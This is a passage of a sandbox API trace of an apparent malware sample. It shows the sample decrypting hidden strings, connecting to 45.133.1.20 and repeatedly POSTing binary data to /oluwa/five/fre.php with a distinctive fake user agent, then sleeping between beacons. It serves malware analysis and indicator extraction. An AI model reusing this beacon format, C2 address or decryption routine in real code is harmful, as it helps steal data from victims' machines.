ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0232.864] GetProcessHeap () returned 0x6a0000 [0232.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0232.864] GetProcessHeap () returned 0x6a0000 [0232.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0232.865] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0232.866] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0232.866] GetProcessHeap () returned 0x6a0000 [0232.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bf5d8 [0232.866] GetProcessHeap () returned 0x6a0000 [0232.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0232.867] GetProcessHeap () returned 0x6a0000 [0232.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0232.867] GetProcessHeap () returned 0x6a0000 [0232.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d7f08 [0232.868] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0232.868] wvsprintfA (in: param_1=0x6d7f08, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0232.868] GetProcessHeap () returned 0x6a0000 [0232.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0232.868] GetProcessHeap () returned 0x6a0000 [0232.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0232.869] send (s=0x728, buf=0x6bd460*, len=242, flags=0) returned 242 [0232.870] send (s=0x728, buf=0x6bb998*, len=159, flags=0) returned 159 [0232.870] GetProcessHeap () returned 0x6a0000 [0232.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d7f08 [0232.870] recv (in: s=0x728, buf=0x6d7f08, len=4048, flags=0 | out: buf=0x6d7f08*) returned 204 [0232.950] GetProcessHeap () returned 0x6a0000 [0232.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0232.950] GetProcessHeap () returned 0x6a0000 [0232.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0232.951] GetProcessHeap () returned 0x6a0000 [0232.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf5d8 | out: hHeap=0x6a0000) returned 1 [0232.952] GetProcessHeap () returned 0x6a0000 [0232.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0232.952] closesocket (s=0x728) returned 0 [0232.953] GetProcessHeap () returned 0x6a0000 [0232.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0232.953] GetProcessHeap () returned 0x6a0000 [0232.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0232.954] GetProcessHeap () returned 0x6a0000 [0232.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0232.954] GetProcessHeap () returned 0x6a0000 [0232.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0232.959] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d7f08, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x145c) returned 0x728 [0232.962] Sleep (dwMilliseconds=0xea60) [0232.964] GetProcessHeap () returned 0x6a0000 [0232.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0232.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.966] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0232.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.981] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0232.990] GetProcessHeap () returned 0x6a0000 [0232.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d92d0 [0232.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.997] CryptImportKey (in: hProv=0x6bef48, pbData=0x6d92d0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0232.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.998] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0232.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.999] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0232.999] GetProcessHeap () returned 0x6a0000 [0233.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d92d0 | out: hHeap=0x6a0000) returned 1 [0233.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.001] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0233.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.002] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0233.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.006] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0233.006] GetProcessHeap () returned 0x6a0000 [0233.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0233.007] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.007] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0233.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.008] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0233.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.009] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0233.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.010] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0233.010] GetProcessHeap () returned 0x6a0000 [0233.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0233.010] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0233.010] GetProcessHeap () returned 0x6a0000 [0233.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0233.011] GetProcessHeap () returned 0x6a0000 [0233.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0233.011] GetProcessHeap () returned 0x6a0000 [0233.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0233.011] GetProcessHeap () returned 0x6a0000 [0233.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0233.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.013] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0233.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.023] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0233.032] GetProcessHeap () returned 0x6a0000 [0233.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0233.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.033] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0233.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.034] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0233.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.034] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0233.034] GetProcessHeap () returned 0x6a0000 [0233.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0233.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.036] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0233.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.037] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0233.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.038] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0233.038] GetProcessHeap () returned 0x6a0000 [0233.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0233.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.039] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0233.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.040] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0233.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.041] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0233.042] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.042] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0233.042] GetProcessHeap () returned 0x6a0000 [0233.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0233.042] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0233.042] GetProcessHeap () returned 0x6a0000 [0233.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baab0 [0233.042] socket (af=2, type=1, protocol=6) returned 0x72c [0233.043] connect (s=0x72c, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0233.072] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0233.072] GetProcessHeap () returned 0x6a0000 [0233.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0233.072] GetProcessHeap () returned 0x6a0000 [0233.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0233.073] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0233.074] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0233.074] GetProcessHeap () returned 0x6a0000 [0233.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bfe18 [0233.074] GetProcessHeap () returned 0x6a0000 [0233.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0233.075] GetProcessHeap () returned 0x6a0000 [0233.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0233.075] GetProcessHeap () returned 0x6a0000 [0233.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0233.076] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0233.077] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0233.077] GetProcessHeap () returned 0x6a0000 [0233.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0233.077] GetProcessHeap () returned 0x6a0000 [0233.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0233.077] send (s=0x72c, buf=0x6bd460*, len=242, flags=0) returned 242 [0233.078] send (s=0x72c, buf=0x6bb998*, len=159, flags=0) returned 159 [0233.078] GetProcessHeap () returned 0x6a0000 [0233.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d7f08 [0233.078] recv (in: s=0x72c, buf=0x6d7f08, len=4048, flags=0 | out: buf=0x6d7f08*) returned 204 [0233.150] GetProcessHeap () returned 0x6a0000 [0233.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0233.152] GetProcessHeap () returned 0x6a0000 [0233.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0233.152] GetProcessHeap () returned 0x6a0000 [0233.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bfe18 | out: hHeap=0x6a0000) returned 1 [0233.153] GetProcessHeap () returned 0x6a0000 [0233.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0233.153] closesocket (s=0x72c) returned 0 [0233.154] GetProcessHeap () returned 0x6a0000 [0233.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baab0 | out: hHeap=0x6a0000) returned 1 [0233.154] GetProcessHeap () returned 0x6a0000 [0233.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0233.155] GetProcessHeap () returned 0x6a0000 [0233.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0233.155] GetProcessHeap () returned 0x6a0000 [0233.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0233.156] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d7f08, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1460) returned 0x72c [0233.158] Sleep (dwMilliseconds=0xea60) [0233.160] GetProcessHeap () returned 0x6a0000 [0233.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0233.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.162] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0233.171] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.172] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0233.183] GetProcessHeap () returned 0x6a0000 [0233.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0233.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.185] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0233.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.186] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0233.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.188] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0233.188] GetProcessHeap () returned 0x6a0000 [0233.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0233.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.192] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0233.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.194] CryptDestroyKey (hKey=0x6ad020) returned 1 [0233.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.199] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0233.200] GetProcessHeap () returned 0x6a0000 [0233.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0233.201] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.201] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0233.202] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.202] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0233.203] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.204] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0233.205] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.205] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0233.205] GetProcessHeap () returned 0x6a0000 [0233.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0233.205] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0233.205] GetProcessHeap () returned 0x6a0000 [0233.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0233.206] GetProcessHeap () returned 0x6a0000 [0233.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0233.207] GetProcessHeap () returned 0x6a0000 [0233.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0233.208] GetProcessHeap () returned 0x6a0000 [0233.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0233.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.211] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0233.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.220] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0233.231] GetProcessHeap () returned 0x6a0000 [0233.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0233.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.233] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0233.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.237] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0233.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.238] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0233.238] GetProcessHeap () returned 0x6a0000 [0233.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0233.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.240] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0233.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.241] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0233.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0233.242] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0233.243] GetProcessHeap () returned 0x6a0000 [0233.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0233.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.244] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0233.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.245] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0233.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.247] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0233.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.248] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0233.248] GetProcessHeap () returned 0x6a0000 [0233.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0233.248] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0233.248] GetProcessHeap () returned 0x6a0000 [0233.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0233.248] socket (af=2, type=1, protocol=6) returned 0x730 [0233.249] connect (s=0x730, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0233.276] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0233.276] GetProcessHeap () returned 0x6a0000 [0233.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0233.276] GetProcessHeap () returned 0x6a0000 [0233.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0233.277] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0233.279] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0233.279] GetProcessHeap () returned 